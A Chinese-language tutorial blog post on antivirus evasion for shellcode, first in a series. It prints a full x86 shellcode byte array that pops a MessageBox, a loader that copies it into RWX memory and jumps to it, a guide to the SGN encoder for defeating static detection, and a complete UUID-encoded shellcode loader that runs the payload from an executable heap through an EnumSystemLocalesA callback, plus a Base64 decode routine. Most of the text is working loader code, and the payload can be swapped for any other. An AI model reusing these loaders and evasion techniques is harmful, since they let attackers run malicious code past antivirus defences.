shellcode免杀(一)
此篇文章不涉及shellcode的编写,只讨论shellcode的加密方式。
首先准备一段shellcode,我这里准备的是弹出messagebox的shellcode,shellcode和loader如下:
#include <windows.h>
#include <iostream>
using namespace std;
unsigned char shellcode[1272] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0xB8, 0x4B, 0x00, 0x00, 0x00, 0x66, 0x89, 0x45, 0x98, 0xB9,
0x45, 0x00, 0x00, 0x00, 0x66, 0x89, 0x4D, 0x9A, 0xBA, 0x52, 0x00, 0x00, 0x00, 0x66, 0x89, 0x55,
0x9C, 0xB8, 0x4E, 0x00, 0x00, 0x00, 0x66, 0x89, 0x45, 0x9E, 0xB9, 0x45, 0x00, 0x00, 0x00, 0x66,
0x89, 0x4D, 0xA0, 0xBA, 0x4C, 0x00, 0x00, 0x00, 0x66, 0x89, 0x55, 0xA2, 0xB8, 0x33, 0x00, 0x00,
0x00, 0x66, 0x89, 0x45, 0xA4, 0xB9, 0x32, 0x00, 0x00, 0x00, 0x66, 0x89, 0x4D, 0xA6, 0xBA, 0x2E,
0x00, 0x00, 0x00, 0x66, 0x89, 0x55, 0xA8, 0xB8, 0x44, 0x00, 0x00, 0x00, 0x66, 0x89, 0x45, 0xAA,
0xB9, 0x4C, 0x00, 0x00, 0x00, 0x66, 0x89, 0x4D, 0xAC, 0xBA, 0x4C, 0x00, 0x00, 0x00, 0x66, 0x89,
0x55, 0xAE, 0x33, 0xC0, 0x66, 0x89, 0x45, 0xB0, 0x8D, 0x4D, 0x98, 0x51, 0xE8, 0x7F, 0x02, 0x00,
0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xFC, 0xC6, 0x45, 0xB4, 0x47, 0xC6, 0x45, 0xB5, 0x65, 0xC6,
0x45, 0xB6, 0x74, 0xC6, 0x45, 0xB7, 0x50, 0xC6, 0x45, 0xB8, 0x72, 0xC6, 0x45, 0xB9, 0x6F, 0xC6,
0x45, 0xBA, 0x63, 0xC6, 0x45, 0xBB, 0x41, 0xC6, 0x45, 0xBC, 0x64, 0xC6, 0x45, 0xBD, 0x64, 0xC6,
0x45, 0xBE, 0x72, 0xC6, 0x45, 0xBF, 0x65, 0xC6, 0x45, 0xC0, 0x73, 0xC6, 0x45, 0xC1, 0x73, 0xC6,
0x45, 0xC2, 0x00, 0xC6, 0x45, 0xC4, 0x4C, 0xC6, 0x45, 0xC5, 0x6F, 0xC6, 0x45, 0xC6, 0x61, 0xC6,
0x45, 0xC7, 0x64, 0xC6, 0x45, 0xC8, 0x4C, 0xC6, 0x45, 0xC9, 0x69, 0xC6, 0x45, 0xCA, 0x62, 0xC6,
0x45, 0xCB, 0x72, 0xC6, 0x45, 0xCC, 0x61, 0xC6, 0x45, 0xCD, 0x72, 0xC6, 0x45, 0xCE, 0x79, 0xC6,
0x45, 0xCF, 0x41, 0xC6, 0x45, 0xD0, 0x00, 0x8D, 0x55, 0xB4, 0x52, 0x8B, 0x45, 0xFC, 0x50, 0xE8,
0x5C, 0x03, 0x00, 0x00, 0x89, 0x45, 0xF0, 0x8D, 0x4D, 0xC4, 0x51, 0x8B, 0x55, 0xFC, 0x52, 0xE8,
0x4C, 0x03, 0x00, 0x00, 0x89, 0x45, 0xF8, 0xC6, 0x45, 0xE0, 0x75, 0xC6, 0x45, 0xE1, 0x73, 0xC6,
0x45, 0xE2, 0x65, 0xC6, 0x45, 0xE3, 0x72, 0xC6, 0x45, 0xE4, 0x33, 0xC6, 0x45, 0xE5, 0x32, 0xC6,
0x45, 0xE6, 0x2E, 0xC6, 0x45, 0xE7, 0x64, 0xC6, 0x45, 0xE8, 0x6C, 0xC6, 0x45, 0xE9, 0x6C, 0xC6,
0x45, 0xEA, 0x00, 0x8D, 0x45, 0xE0, 0x50, 0xFF, 0x55, 0xF8, 0x89, 0x45, 0xF4, 0xC6, 0x45, 0xD4,
0x4D, 0xC6, 0x45, 0xD5, 0x65, 0xC6, 0x45, 0xD6, 0x73, 0xC6, 0x45, 0xD7, 0x73, 0xC6, 0x45, 0xD8,
0x61, 0xC6, 0x45, 0xD9, 0x67, 0xC6, 0x45, 0xDA, 0x65, 0xC6, 0x45, 0xDB, 0x42, 0xC6, 0x45, 0xDC,
0x6F, 0xC6, 0x45, 0xDD, 0x78, 0xC6, 0x45, 0xDE, 0x57, 0xC6, 0x45, 0xDF, 0x00, 0x8D, 0x4D, 0xD4,
0x51, 0x8B, 0x55, 0xF4, 0x52, 0xFF, 0x55, 0xF0, 0x89, 0x45, 0xEC, 0x6A, 0x00, 0x6A, 0x00, 0x6A,
0x00, 0x6A, 0x00, 0xFF, 0x55, 0xEC, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x45, 0xFC,
0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x45, 0xFC, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xFC, 0x8B,
0x4D, 0x08, 0x03, 0x4D, 0xFC, 0x0F, 0xBE, 0x11, 0x85, 0xD2, 0x74, 0x0B, 0x8B, 0x45, 0xF8, 0x83,
0xC0, 0x01, 0x89, 0x45, 0xF8, 0xEB, 0xDF, 0x8B, 0x45, 0xF8, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x45, 0xFC,
0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x45, 0xFC, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xFC, 0x8B,
0x4D, 0xFC, 0x8B, 0x55, 0x08, 0x0F, 0xB7, 0x04, 0x4A, 0x85, 0xC0, 0x74, 0x0B, 0x8B, 0x4D, 0xF8,
0x83, 0xC1, 0x01, 0x89, 0x4D, 0xF8, 0xEB, 0xDE, 0x8B, 0x45, 0xF8, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x0C, 0x8B, 0x45, 0x08, 0x50, 0xE8, 0x71, 0xFF, 0xFF, 0xFF, 0x83,
0xC4, 0x04, 0x89, 0x45, 0xF8, 0x8B, 0x4D, 0x0C, 0x51, 0xE8, 0x62, 0xFF, 0xFF, 0xFF, 0x83, 0xC4,
0x04, 0x89, 0x45, 0xF4, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x55, 0xFC,
0x83, 0xC2, 0x01, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xFC, 0x3B, 0x45, 0xF8, 0x7D, 0x25, 0x8B, 0x4D,
0xFC, 0x3B, 0x4D, 0xF4, 0x7D, 0x1D, 0x8B, 0x55, 0x08, 0x03, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x8B,
0x4D, 0x0C, 0x03, 0x4D, 0xFC, 0x0F, 0xBE, 0x11, 0x3B, 0xC2, 0x74, 0x05, 0x83, 0xC8, 0xFF, 0xEB,
0x04, 0xEB, 0xCA, 0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x0C, 0x8B, 0x45, 0x08, 0x50, 0xE8, 0x41, 0xFF, 0xFF, 0xFF, 0x83,
0xC4, 0x04, 0x89, 0x45, 0xF8, 0x8B, 0x4D, 0x0C, 0x51, 0xE8, 0x32, 0xFF, 0xFF, 0xFF, 0x83, 0xC4,
0x04, 0x89, 0x45, 0xF4, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x55, 0xFC,
0x83, 0xC2, 0x01, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xFC, 0x3B, 0x45, 0xF8, 0x7D, 0x27, 0x8B, 0x4D,
0xFC, 0x3B, 0x4D, 0xF4, 0x7D, 0x1F, 0x8B, 0x55, 0xFC, 0x8B, 0x45, 0x08, 0x0F, 0xB7, 0x0C, 0x50,
0x8B, 0x55, 0xFC, 0x8B, 0x45, 0x0C, 0x0F, 0xB7, 0x14, 0x50, 0x3B, 0xCA, 0x74, 0x05, 0x83, 0xC8,
0xFF, 0xEB, 0x04, 0xEB, 0xC8, 0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x0C, 0x64, 0xA1, 0x18, 0x00, 0x00, 0x00, 0x8B, 0x40, 0x30, 0x89,
0x45, 0xF4, 0x8B, 0x45, 0xF4, 0x8B, 0x48, 0x0C, 0x89, 0x4D, 0xF8, 0x8B, 0x55, 0xF8, 0x8B, 0x42,
0x0C, 0x89, 0x45, 0xFC, 0x8B, 0x4D, 0xF8, 0x8B, 0x55, 0xFC, 0x8B, 0x41, 0x0C, 0x3B, 0x02, 0x74,
0x29, 0x8B, 0x4D, 0x08, 0x51, 0x8B, 0x55, 0xFC, 0x8B, 0x42, 0x30, 0x50, 0xE8, 0x4F, 0xFF, 0xFF,
0xFF, 0x83, 0xC4, 0x08, 0x85, 0xC0, 0x75, 0x08, 0x8B, 0x4D, 0xFC, 0x8B, 0x41, 0x18, 0xEB, 0x0C,
0x8B, 0x55, 0xFC, 0x8B, 0x02, 0x89, 0x45, 0xFC, 0xEB, 0xCA, 0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x8B, 0x45, 0x08, 0x03, 0x45, 0x0C, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x20, 0x8B, 0x45, 0x08, 0x89, 0x45, 0xF4, 0x8B, 0x4D, 0xF4, 0x8B,
0x51, 0x3C, 0x03, 0x55, 0x08, 0x89, 0x55, 0xF0, 0x8B, 0x45, 0x08, 0x50, 0xB9, 0x08, 0x00, 0x00,
0x00, 0x6B, 0xD1, 0x00, 0x8B, 0x45, 0xF0, 0x8B, 0x4C, 0x10, 0x78, 0x51, 0xE8, 0xBF, 0xFF, 0xFF,
0xFF, 0x83, 0xC4, 0x08, 0x89, 0x45, 0xF8, 0x8B, 0x55, 0x08, 0x52, 0x8B, 0x45, 0xF8, 0x8B, 0x48,
0x20, 0x51, 0xE8, 0xA9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0x89, 0x45, 0xEC, 0x8B, 0x55, 0x08,
0x52, 0x8B, 0x45, 0xF8, 0x8B, 0x48, 0x24, 0x51, 0xE8, 0x93, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08,
0x89, 0x45, 0xE4, 0x8B, 0x55, 0x08, 0x52, 0x8B, 0x45, 0xF8, 0x8B, 0x48, 0x1C, 0x51, 0xE8, 0x7D,
0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0x89, 0x45, 0xE0, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00,
0xEB, 0x09, 0x8B, 0x55, 0xFC, 0x83, 0xC2, 0x01, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xF8, 0x8B, 0x4D,
0xFC, 0x3B, 0x48, 0x18, 0x73, 0x4E, 0x8B, 0x55, 0x08, 0x52, 0x8B, 0x45, 0xFC, 0x8B, 0x4D, 0xEC,
0x8B, 0x14, 0x81, 0x52, 0xE8, 0x47, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0x89, 0x45, 0xE8, 0x8B,
0x45, 0x0C, 0x50, 0x8B, 0x4D, 0xE8, 0x51, 0xE8, 0xF4, 0xFD, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0x85,
0xC0, 0x75, 0x1F, 0x8B, 0x55, 0x08, 0x52, 0x8B, 0x45, 0xFC, 0x8B, 0x4D, 0xE4, 0x0F, 0xB7, 0x14,
0x41, 0x8B, 0x45, 0xE0, 0x8B, 0x0C, 0x90, 0x51, 0xE8, 0x13, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08,
0xEB, 0x04, 0xEB, 0x9E, 0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC2, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x18, 0x81, 0x7D, 0x0C, 0xFF, 0xFF, 0x00, 0x00, 0x72, 0x11, 0x8B,
0x45, 0x0C, 0x50, 0x8B, 0x4D, 0x08, 0x51, 0xE8, 0xF4, 0xFE, 0xFF, 0xFF, 0xEB, 0x75, 0xEB, 0x71,
0x8B, 0x55, 0x08, 0x89, 0x55, 0xF8, 0x8B, 0x45, 0xF8, 0x8B, 0x48, 0x3C, 0x03, 0x4D, 0x08, 0x89,
0x4D, 0xF4, 0x8B, 0x55, 0x08, 0x52, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x6B, 0xC8, 0x00, 0x8B, 0x55,
0xF4, 0x8B, 0x44, 0x0A, 0x78, 0x50, 0xE8, 0xB5, 0xFE, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0x89, 0x45,
0xFC, 0x8B, 0x4D, 0x08, 0x51, 0x8B, 0x55, 0xFC, 0x8B, 0x42, 0x1C, 0x50, 0xE8, 0x9F, 0xFE, 0xFF,
0xFF, 0x83, 0xC4, 0x08, 0x89, 0x45, 0xEC, 0x8B, 0x4D, 0xFC, 0x8B, 0x51, 0x10, 0x89, 0x55, 0xF0,
0x8B, 0x45, 0x08, 0x50, 0x8B, 0x4D, 0x0C, 0x2B, 0x4D, 0xF0, 0x8B, 0x55, 0xEC, 0x8B, 0x04, 0x8A,
0x50, 0xE8, 0x7A, 0xFE, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0x89, 0x45, 0xE8, 0x8B, 0x45, 0xE8, 0xEB,
0x02, 0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC2, 0x08
};
typedef HMODULE(*fun)();
int main(int argc, char* argv[])
{
LPVOID addressPoniter = VirtualAlloc(NULL, sizeof(shellcode), 4096, 0x40);
RtlMoveMemory(addressPoniter, shellcode, sizeof(shellcode));
HMODULE HD = ((fun)addressPoniter)();
Sleep(1000);
system("pause");
std::cout << "Hello World!\n";
}
1.sgn工具的使用
针对网络安全社区来说,原始版本的SGN编码器一开始被认为是最好的Shellcode编码器,(直到现在其实也是)。作者的github地址是EgeBalci/sgn:仕方がない编码器移植到Go中,进行了多项改进 (github.com),可以去下载编译好的exe或者也可以下载源代码。很有意思的一点是,作者直接在github上发起一项挑战,作者认为认为任何基于规则的静态检测机制都不能检测到用SGN编码的二进制文件,如果有人能编写一个可以检测每个编码输出的 YARA 规则,作者愿意拿出奖金来。
首先拿到我们的bin文件
然后拿到我们的sgn目录下,利用工具加密。
可以看到输入输出的文件名和文件大小。
将输出的bin文件拿到loader去执行,发现成功弹窗。
2.UUID加密
UUID是什么?
通用唯一识别码(Universally Unique Identifier,缩写:UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。
当然还有一种GUID(全局唯一标识符(英语:Globally Unique Identifier,缩写:GUID)),是一种由算法生成的唯一标识,通常表示成32个16进制数字(0-9,A-F)组成的字符串,如:{21EC2020-3AEA-1069-A2DD-08002B30309D},它实质上是一个128位长的二进制整数
我们这里通过uuid方式将shellcode写入内存中,在这里我们利用工具先将shellcode转换成uuid编码,工具在这里Haunted-Banshee/Shellcode-Hastur: Shellcode Reductio Entropy Tools (github.com),工具还有一些其他的功能。
如果想研究编码原理以及源码的可以参考这里UuidShellcodeExec/shellcodeToUUID.py at main · ChoiSG/UuidShellcodeExec (github.com)。
到这里,我们就拿到了我们shellcode的uuid编码。
loader中操作如下:
第一步,创建并分配堆内存
HANDLE HeapCreate(
DWORD flOptions,
SIZE_T dwInitialSize,
SIZE_T dwMaximumSize
);
HeapCreate 函数原型如上,在这里第一个参数必须是“HEAP_CREATE_ENABLE_EXECUTE”,否则当我们试图在来自堆的内存块中执行代码时,系统会抛出EXCEPTION_ACCESS_VIOLATION异常。其他两个参数设置为0即可,其中dwMaximumSize为0,表示堆内存大小是可增长的,其大小仅受限于系统可用内存大小。
DECLSPEC_ALLOCATOR LPVOID HeapAlloc(
HANDLE hHeap,
DWORD dwFlags,
SIZE_T dwBytes
);
接下来,使用 HeapAlloc 函数在刚创建的堆上分配内存。申请的内存应为sizeof(uuids)*16。
第二步,将shellcode植入堆内存
这里使用了 UuidFromStringA 函数。
RPC_STATUS UuidFromStringA(
RPC_CSTR StringUuid,
UUID *Uuid
);
首先,我们使用 UuidToStringA 函数将 shellcode 转成 string UUID,运行时再使用 UuidFromStringA 将其提出来放入上一步分配的堆内存,最后使用EnumSystemLocalesA 回调函数 来执行。
EnumSystemLocalesA ,该函数用于枚举系统中可用的区域设置(locales)。在这里我们利用回调机制来执行我们的shellcode,减少了敏感函数的使用。
上代码
#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
//#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
const char* uuids[] =
{
"83ec8b55-68ec-4bb8-0000-0066894598b9",
"00000045-8966-9a4d-ba52-000000668955",
"004eb89c-0000-8966-459e-b94500000066",
"baa04d89-004c-0000-6689-55a2b8330000",
"45896600-b9a4-0032-0000-66894da6ba2e",
"66000000-5589-b8a8-4400-0000668945aa",
"00004cb9-6600-4d89-acba-4c0000006689",
"c033ae55-8966-b045-8d4d-9851e87f0200",
"04c48300-4589-c6fc-45b4-47c645b565c6",
"c674b645-b745-c650-45b8-72c645b96fc6",
"c663ba45-bb45-c641-45bc-64c645bd64c6",
"c672be45-bf45-c665-45c0-73c645c173c6",
"c600c245-c445-c64c-45c5-6fc645c661c6",
"c664c745-c845-c64c-45c9-69c645ca62c6",
"c672cb45-cc45-c661-45cd-72c645ce79c6",
"c641cf45-d045-8d00-55b4-528b45fc50e8",
"0000035c-4589-8df0-4dc4-518b55fc52e8",
"0000034c-4589-c6f8-45e0-75c645e173c6",
"c665e245-e345-c672-45e4-33c645e532c6",
"c62ee645-e745-c664-45e8-6cc645e96cc6",
"8d00ea45-e045-ff50-55f8-8945f4c645d4",
"d545c64d-c665-d645-73c6-45d773c645d8",
"d945c661-c667-da45-65c6-45db42c645dc",
"dd45c66f-c678-de45-57c6-45df008d4dd4",
"f4558b51-ff52-f055-8945-ec6a006a006a",
"ff006a00-ec55-e58b-5dc3-cccccccccccc",
"83ec8b55-08ec-45c7-f800-000000c745fc",
"00000000-09eb-458b-fc83-c0018945fc8b",
"4d03084d-0ffc-11be-85d2-740b8b45f883",
"458901c0-ebf8-8bdf-45f8-8be55dc3cccc",
"83ec8b55-08ec-45c7-f800-000000c745fc",
"00000000-09eb-458b-fc83-c0018945fc8b",
"558bfc4d-0f08-04b7-4a85-c0740b8b4df8",
"8901c183-f84d-deeb-8b45-f88be55dc3cc",
"83ec8b55-0cec-458b-0850-e871ffffff83",
"458904c4-8bf8-0c4d-51e8-62ffffff83c4",
"f4458904-45c7-00fc-0000-00eb098b55fc",
"8901c283-fc55-458b-fc3b-45f87d258b4d",
"f44d3bfc-1d7d-558b-0803-55fc0fbe028b",
"4d030c4d-0ffc-11be-3bc2-740583c8ffeb",
"33caeb04-8bc0-5de5-c3cc-cccccccccccc",
"83ec8b55-0cec-458b-0850-e841ffffff83",
"458904c4-8bf8-0c4d-51e8-32ffffff83c4",
"f4458904-45c7-00fc-0000-00eb098b55fc",
"8901c283-fc55-458b-fc3b-45f87d278b4d",
"f44d3bfc-1f7d-558b-fc8b-45080fb70c50",
"8bfc558b-0c45-b70f-1450-3bca740583c8",
"eb04ebff-33c8-8bc0-e55d-c3cccccccccc",
"83ec8b55-0cec-a164-1800-00008b403089",
"458bf445-8bf4-0c48-894d-f88b55f88b42",
"fc45890c-4d8b-8bf8-55fc-8b410c3b0274",
"084d8b29-8b51-fc55-8b42-3050e84fffff",
"08c483ff-c085-0875-8b4d-fc8b4118eb0c",
"8bfc558b-8902-fc45-ebca-33c08be55dc3",
"8bec8b55-0845-4503-0c5d-c3cccccccccc",
"83ec8b55-20ec-458b-0889-45f48b4df48b",
"55033c51-8908-f055-8b45-0850b9080000",
"00d16b00-458b-8bf0-4c10-7851e8bfffff",
"08c483ff-4589-8bf8-5508-528b45f88b48",
"a9e85120-ffff-83ff-c408-8945ec8b5508",
"f8458b52-488b-5124-e893-ffffff83c408",
"8be44589-0855-8b52-45f8-8b481c51e87d",
"83ffffff-08c4-4589-e0c7-45fc00000000",
"558b09eb-83fc-01c2-8955-fc8b45f88b4d",
"18483bfc-4e73-558b-0852-8b45fc8b4dec",
"5281148b-47e8-ffff-ff83-c4088945e88b",
"8b500c45-e84d-e851-f4fd-ffff83c40885",
"8b1f75c0-0855-8b52-45fc-8b4de40fb714",
"e0458b41-0c8b-5190-e813-ffffff83c408",
"9eeb04eb-c033-e58b-5dc2-0800cccccccc",
"83ec8b55-18ec-7d81-0cff-ff000072118b",
"8b500c45-084d-e851-f4fe-ffffeb75eb71",
"8908558b-f855-458b-f88b-483c034d0889",
"558bf44d-5208-08b8-0000-006bc8008b55",
"0a448bf4-5078-b5e8-feff-ff83c4088945",
"084d8bfc-8b51-fc55-8b42-1c50e89ffeff",
"08c483ff-4589-8bec-4dfc-8b51108955f0",
"5008458b-4d8b-2b0c-4df0-8b55ec8b048a",
"fe7ae850-ffff-c483-0889-45e88b45e8eb",
"8bc03302-5de5-08c2-0000-000000000000",
};
int main()
{
HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);//创建堆,并标记为可执行
void* ha = HeapAlloc(hc, 0, sizeof(uuids)*16);//为堆申请空间
DWORD_PTR hptr = (DWORD_PTR)ha;
int elems = sizeof(uuids) / sizeof(uuids[0]);
//uuid转换成string
for (int i = 0; i < elems; i++) {
RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr);
if (status != RPC_S_OK) {
CloseHandle(ha);
return -1;
}
hptr += 16;
}
EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0);//回调函数
CloseHandle(ha);
return 0;
}
这里也有一些分析文章:
RIFT:分析Lazarus shellcode执行方法 |NCC集团研究博客 |让世界更安全、更有保障 (nccgroup.com)
3.base64编码
base64是一个经典的编码了,在这里简单介绍一下就可以了。
Base64的编码原理:
Base64 是一种基于64个 ASCII 字符来表示二进制数据的表示方法。
Base64 将8比特位为一个单元的字节数据拆分为以6个比特位为一个单元的二进制片段,每6个比特位单元对应Base64索引表中的一个字符,这样最终构成一个超过编码前字节数据33%的字符串。
定义一个DecodeBase64()函数
int DecodeBase64( const BYTE * src, unsigned int srcLen, char * dst, unsigned int dstLen ) {
DWORD outLen;
BOOL fRet;
outLen = dstLen;
// CryptStringToBinary(源地址、长度、类型、返回序列地址、返回序列长度)
// 成功执行后返回1
fRet = CryptStringToBinary( (LPCSTR) src, srcLen, CRYPT_STRING_BASE64, (BYTE * )dst, &outLen, NULL, NULL);
if (!fRet) outLen = 0; // 失败则返回0
return(outLen); // 函数返回缓冲区大小
}
DecodeBase64()函数中的参数,分别是
- src:指向payload的地址,即base64编码后的payload
- srcLen:payload的长度
- dst:指向解码后写入的地址,本例中exec_mem为新开辟的缓冲区
- dstLen:表示缓冲区长度,这里payload长度和缓冲区长度一致
CryptStringToBinary() 函数将格式化的字符串以某种编码形式转换为二进制序列,函数声明如下:
https://docs.microsoft.com/zh-cn/windows/win32/api/wincrypt/nf-wincrypt-cryptstringtobinarya
BOOL CryptStringToBinaryA(
LPCSTR pszString,
DWORD cchString,
DWORD dwFlags,
BYTE *pbBinary,
DWORD *pcbBinary,
DWORD *pdwSkip,
DWORD *pdwFlags
);
- pszString指向待转换的字符地址,即payload在内存中的地址
- cchString表示待处理payload的大小
- dwFlags表明payload转换格式
- pbBinary指向接收字符的缓冲区
- pcbBinary指向一个变量,表示目的缓冲区大小(pbBinary指向的)
- pdwSkip接收跳过的字符数,一般设置为NULL
- pdwFlags接收跳过的字符数,一般设置为NULL
需要提醒的是,单纯的base64加密效果现在并不好,需要配合其他的加密一起进行。